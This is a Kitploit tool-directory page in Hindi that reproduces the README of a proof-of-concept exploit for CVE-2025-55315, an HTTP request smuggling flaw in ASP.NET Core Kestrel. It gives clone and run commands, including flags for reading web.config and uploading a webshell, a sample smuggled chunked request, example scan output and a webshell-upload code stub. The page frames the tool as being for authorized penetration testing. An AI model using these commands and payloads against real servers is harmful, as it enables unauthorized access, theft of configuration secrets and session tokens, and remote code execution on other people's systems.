Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC शोषण

रिपॉजिटरी देखें
85310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55315 पेंटेस्ट टूल

ASP.NET Core Kestrel के लिए HTTP अनुरोध तस्करी शोषण उपकरण

Python Version CVE CVSS License


⚠️ कानूनी चेतावनी

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है!

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच गैरकानूनी है
  • टूल निर्माता दुरुपयोग के लिए जिम्मेदार नहीं है
  • इस उपकरण का उपयोग करके, आप पूर्ण कानूनी जिम्मेदारी स्वीकार करते हैं

📋 अवलोकन

CVE-2025-55315 (ASP.NET Core Kestrel HTTP अनुरोध तस्करी भेद्यता) के लिए व्यावसायिक पैठ परीक्षण उपकरण। यह उपकरण व्यापक शोषण क्षमताओं के साथ एकल-लक्ष्य विश्लेषण के लिए डिज़ाइन किया गया है।

CVE-2025-55315 क्या है?

ASP.NET Core Kestrel वेब सर्वर में एक गंभीर HTTP अनुरोध तस्करी भेद्यता (CVSS 9.9/10) जो हमलावरों को अनुमति देती है:

  • प्रमाणीकरण को बायपास करना
  • क्रेडेंशियल और सत्र टोकन चुराना
  • सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) करना
  • कैश को जहर देना
  • वेबशेल अपलोड करना और दूरस्थ कोड निष्पादन प्राप्त करना

प्रभावित संस्करण:

  • .NET Core 3.0 से .NET 9.0.9 तक
  • .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+ में सुधार किया गया

✨ विशेषताएँ

मुख्य क्षमताएँ

  • ✅ एकल लक्ष्य विश्लेषण - विशिष्ट लक्ष्य पर केंद्रित पैठ परीक्षण
  • ✅ स्वचालित एंडपॉइंट खोज - सामान्य ASP.NET Core एंडपॉइंट की खोज
  • ✅ मैनुअल एंडपॉइंट परीक्षण - रुचि के विशिष्ट एंडपॉइंट का परीक्षण
  • ✅ भेद्यता पहचान - सटीक CVE-2025-55315 पहचान
  • ✅ web.config निष्कर्षण - अनुरोध तस्करी के माध्यम से कॉन्फ़िगरेशन फ़ाइलें पढ़ना
  • ✅ वेबशेल अपलोड - वैकल्पिक वेबशेल तैनाती क्षमता
  • ✅ विस्तृत रिपोर्टिंग - JSON और टेक्स्ट प्रारूप में रिपोर्ट
  • ✅ सुरक्षा सुविधाएँ - विनाशकारी कार्यों के लिए कई पुष्टि संकेत

तकनीकी विशेषताएँ

  • HTTP/1.1 और HTTPS समर्थन
  • कस्टम पोर्ट समर्थन
  • कॉन्फ़िगरेबल टाइमआउट
  • वर्बोज़ डिबगिंग मोड
  • रंग-कोडित टर्मिनल आउटपुट
  • SSL प्रमाणपत्र सत्यापन बायपास (परीक्षण के लिए)

🔧 स्थापना

आवश्यकताएँ

root@kitploit:~
# Python 3.7 या उच्चतर
python3 --version

# कोई बाहरी निर्भरता नहीं - केवल मानक लाइब्रेरी का उपयोग करता है

डाउनलोड

root@kitploit:~
# टूल को क्लोन या डाउनलोड करें
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# निष्पादन योग्य बनाएं
chmod +x cve_2025_55315_PoC.py

🚀 त्वरित आरंभ

बुनियादी भेद्यता स्कैन

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

यह करेगा:

  1. सर्वर जानकारी एकत्र करना
  2. स्वचालित रूप से सक्रिय एंडपॉइंट खोजना
  3. प्रत्येक एंडपॉइंट का CVE-2025-55315 के लिए परीक्षण
  4. टर्मिनल में परिणाम प्रदर्शित करना

विशिष्ट एंडपॉइंट का परीक्षण

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

web.config निष्कर्षण के साथ पूर्ण स्कैन

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

उन्नत: पूर्ण शोषण (केवल अधिकृत!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 उपयोग उदाहरण

उदाहरण 1: त्वरित जाँच

परिदृश्य: जाँचें कि प्रोडक्शन सर्वर असुरक्षित है या नहीं

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

अपेक्षित अवधि: 30-60 सेकंड


उदाहरण 2: विस्तृत स्कैन

परिदृश्य: वर्बोज़ आउटपुट के साथ व्यापक एंडपॉइंट स्कैन

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

अपेक्षित अवधि: 2-5 मिनट


उदाहरण 3: एकाधिक एंडपॉइंट को लक्षित करें

परिदृश्य: विशिष्ट महत्वपूर्ण एंडपॉइंट का परीक्षण

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

उदाहरण 4: गैर-SSL लक्ष्य

परिदृश्य: आंतरिक HTTP सर्वर का परीक्षण

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 कमांड-लाइन विकल्प

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

अनिवार्य तर्क:
  -t, --target         लक्ष्य होस्टनाम या URL (जैसे, target.com)

वैकल्पिक तर्क:
  -p, --port           पोर्ट नंबर (डिफ़ॉल्ट: SSL के लिए 443, गैर-SSL के लिए 80)
  -e, --endpoint       परीक्षण करने के लिए विशिष्ट एंडपॉइंट (एकाधिक बार उपयोग किया जा सकता है)
  --no-ssl             SSL/HTTPS अक्षम करें (HTTP का उपयोग करें)
  --read-config        web.config फ़ाइल पढ़ने का प्रयास करें
  --upload-shell       वेबशेल अपलोड का प्रयास करें (पुष्टि आवश्यक)
  -o, --output         रिपोर्ट को फ़ाइल में सहेजें
  -v, --verbose        वर्बोज़ आउटपुट सक्षम करें
  --timeout            सेकंड में सॉकेट टाइमआउट (डिफ़ॉल्ट: 10)
  -h, --help           सहायता संदेश दिखाएँ

🔍 आउटपुट को समझना

असुरक्षित सिस्टम उदाहरण

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

व्याख्या:

  • 🔴 गंभीर भेद्यता का पता चला
  • 🔴 एकाधिक एंडपॉइंट असुरक्षित हैं
  • 🔴 कॉन्फ़िगरेशन फ़ाइल सफलतापूर्वक निकाली गई
  • ⚡ तत्काल: .NET 8.0.21+ या 9.0.10+ पर अपडेट करें

सुरक्षित सिस्टम उदाहरण

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

व्याख्या:

  • ✅ सिस्टम सुरक्षित है
  • ✅ पैच किए गए Kestrel संस्करण पर चल रहा है
  • ✅ सभी दुर्भावनापूर्ण अनुरोध अस्वीकार कर दिए गए

🛡️ सुरक्षा और नैतिकता

प्राधिकरण जाँच सूची

यह उपकरण चलाने से पहले, सुनिश्चित करें:

  • आप लक्ष्य सिस्टम के मालिक हैं, या
  • आपके पास परीक्षण के लिए लिखित प्राधिकरण है, और
  • सुरक्षा टीम को सूचित किया गया है, और
  • आपके पास रोलबैक योजना है, और
  • आप कानूनी निहितार्थों को समझते हैं

अंतर्निहित सुरक्षा सुविधाएँ

  1. दो-चरणीय पुष्टि - टूल शुरू करने से पहले प्राधिकरण माँगता है
  2. वेबशेल अपलोड पुष्टि - बड़े अक्षरों में "YES" टाइप करना आवश्यक है
  3. दर सीमित करना - स्वचालित खोज के दौरान अनुरोधों के बीच देरी
  4. टाइमआउट सुरक्षा - लटकते कनेक्शन को रोकता है
  5. विस्तृत लॉगिंग - ऑडिट ट्रेल के लिए सभी क्रियाएँ लॉग की जाती हैं

🔬 तकनीकी विवरण

शोषण तकनीक

यह उपकरण दुर्भावनापूर्ण चंकड ट्रांसफर एन्कोडिंग का उपयोग करके CVE-2025-55315 का शोषण करता है:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← भेद्यता: \r\n के बजाय अकेला \n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← यह एक अलग अनुरोध बन जाता है
Host: target.com

यह क्यों काम करता है:

  1. प्रॉक्सी सर्वर \n को लाइन टर्मिनेटर के रूप में देखता है → इसे एकल अनुरोध के रूप में संसाधित करता है
  2. Kestrel (असुरक्षित) \n को अनदेखा करता है → तस्करी किए गए GET को एक अलग अनुरोध के रूप में मानता है
  3. तस्करी किया गया अनुरोध किसी अन्य उपयोगकर्ता के सत्र संदर्भ में निष्पादित हो सकता है

पहचान तर्क

सर्वर प्रतिक्रियाव्याख्यास्थिति
400 Bad RequestKestrel ने दुर्भावनापूर्ण चंक को अस्वीकार कर दिया✅ सुरक्षित (पैच किया गया)
एकाधिक HTTP/1.1दो अलग-अलग प्रतिक्रियाएँ प्राप्त हुईं❌ असुरक्षित
500 या 502आंतरिक सर्वर त्रुटि⚠️ संभावित रूप से असुरक्षित
सामान्य 200 OKअनुरोध स्वीकार किया गया⚠️ अनिर्णायक

🐛 समस्या निवारण

कनेक्शन विफल

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

समाधान:

  • सुनिश्चित करें कि लक्ष्य पहुँच योग्य है: ping target.com
  • पोर्ट नंबर सही है यह जाँचें
  • SSL के साथ/बिना प्रयास करें: --no-ssl
  • फ़ायरवॉल नियम जाँचें

SSL प्रमाणपत्र त्रुटि

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

समाधान: टूल पहले से ही प्रमाणपत्र सत्यापन अक्षम कर देता है। यदि समस्या बनी रहती है:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

टाइमआउट त्रुटियाँ

root@kitploit:~
[WARNING] No response - possible timeout

समाधान:

  • टाइमआउट बढ़ाएँ: --timeout 30
  • नेटवर्क कनेक्टिविटी जाँचें
  • लक्ष्य धीमा या ओवरलोडेड हो सकता है

अपलोड अवरुद्ध

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

स्पष्टीकरण:

  • सर्वर कॉन्फ़िगरेशन PUT/POST विधियों को अवरुद्ध करता है
  • WAF/IPS अपलोड को अवरुद्ध कर रहा है
  • फ़ाइल अनुमतियाँ लेखन को रोकती हैं

यह सामान्य है - सभी असुरक्षित सिस्टम फ़ाइल अपलोड की अनुमति नहीं देते।


📚 संदर्भ

CVE-2025-55315 संसाधन

  1. Microsoft सुरक्षा सलाह: https://github.com/dotnet/aspnetcore/issues/64033

  2. NVD डेटाबेस: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. प्रेटोरियन अनुसंधान ($10k बग बाउंटी): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. एंड्रयू लॉक का तकनीकी विश्लेषण: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

HTTP अनुरोध तस्करी

  1. PortSwigger अनुसंधान: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 अनुकूलन

कस्टम एंडपॉइंट जोड़ें

स्क्रिप्ट में COMMON_ENDPOINTS संपादित करें:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # अपने एंडपॉइंट यहाँ जोड़ें
]

कस्टम वेबशेल का उपयोग करें

upload_webshell() विधि संशोधित करें:

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- आपका कस्टम ASPX वेबशेल यहाँ -->
        '''

📝 समस्याओं की रिपोर्ट करना

यदि आपको बग मिलते हैं या सुझाव हैं:

  1. वर्बोज़ मोड में चलाएँ: -v
  2. पूर्ण आउटपुट सहेजें: -o debug.txt
  3. शामिल करें:
    • Python संस्करण
    • उपयोग किया गया कमांड
    • त्रुटि संदेश
    • अपेक्षित बनाम वास्तविक व्यवहार

⚖️ कानूनी अस्वीकरण

root@kitploit:~
यह उपकरण "जैसा है" केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण
उद्देश्यों के लिए प्रदान किया जाता है।

लेखक:
❌ अवैध गतिविधियों का समर्थन नहीं करते
❌ दुरुपयोग के लिए जिम्मेदार नहीं हैं
❌ किसी भी क्षति के लिए उत्तरदायी नहीं हैं
❌ कानूनी सलाह प्रदान नहीं करते

इस उपकरण का उपयोग करके आप सहमत हैं:
✅ केवल अधिकृत सिस्टम पर उपयोग करने के लिए
✅ पूर्ण कानूनी जिम्मेदारी स्वीकार करने के लिए
✅ सभी लागू कानूनों का पालन करने के लिए
✅ नैतिक हैकिंग सिद्धांतों का पालन करने के लिए

अनधिकृत उपयोग सख्ती से प्रतिबंधित और अवैध है!

🎓 शैक्षिक उद्देश्य

यह उपकरण निम्नलिखित के लिए बनाया गया था:

  • सुरक्षा शोधकर्ता
  • पैठ परीक्षक
  • बग बाउंटी हंटर
  • सिस्टम प्रशासक
  • सुरक्षा जागरूकता प्रशिक्षण
  • अधिकृत सुरक्षा मूल्यांकन

निम्नलिखित के लिए नहीं:

  • दुर्भावनापूर्ण हमले
  • अनधिकृत पहुंच
  • प्रतिस्पर्धी टोही
  • कोई भी अवैध गतिविधि

🙏 आभार

  • Microsoft सुरक्षा प्रतिक्रिया केंद्र - CVE प्रकटीकरण और पैच के लिए
  • प्रेटोरियन सुरक्षा - मूल भेद्यता अनुसंधान के लिए
  • एंड्रयू लॉक - विस्तृत तकनीकी विश्लेषण के लिए
  • सुरक्षा समुदाय - जिम्मेदार प्रकटीकरण प्रथाओं के लिए

📄 लाइसेंस

केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण

यह उपकरण शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। व्यावसायिक उपयोग, पुनर्वितरण, या दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग सख्त वर्जित है।


🔐 अंतिम चेतावनी

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  इस उपकरण का जिम्मेदारीपूर्वक और कानूनी रूप से उपयोग करें!  ║
║                                                             ║
║  कंप्यूटर सिस्टम तक अनधिकृत पहुंच एक अपराध है।            ║
║  परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें।         ║
║  जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें।               ║
║                                                             ║
║  खुश (कानूनी) हैकिंग!                                      ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝
टूल डाउनलोड करें